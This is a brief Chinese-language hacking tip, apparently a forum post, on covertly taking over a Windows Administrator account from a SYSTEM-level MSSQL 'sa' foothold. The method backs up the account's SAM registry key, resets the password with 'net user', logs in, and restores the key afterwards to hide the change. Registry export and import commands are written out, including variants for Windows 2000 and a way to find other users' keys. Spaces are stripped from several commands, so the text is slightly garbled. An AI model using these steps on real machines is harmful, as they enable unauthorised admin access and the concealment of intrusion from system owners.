1.

sa默认是SYSTEM权限，可以读sam键.

regexportHKLM\SAM\SAM\Domains\Account\Users\000001F4c:\trace.reg

netuseradministratortest

用administrator登陆.

用完机器后

regimportc:\trace.reg

这样就不用克隆，用管理员帐户即可.

2.

如果没用默认的administrator，可以用下面的方法找到对应的sid.

regedit/ec:\test.regHKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\用户名

3.

2000系统不存在REG，用Regedit更具有通用性

regedit/ec:\trace.regHKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4

regedit要写完整路径，不可以用HKLM代替HKEY_LOCAL_MACHINE

完事后用regedit/sc:\trace.reg恢复原来的键值。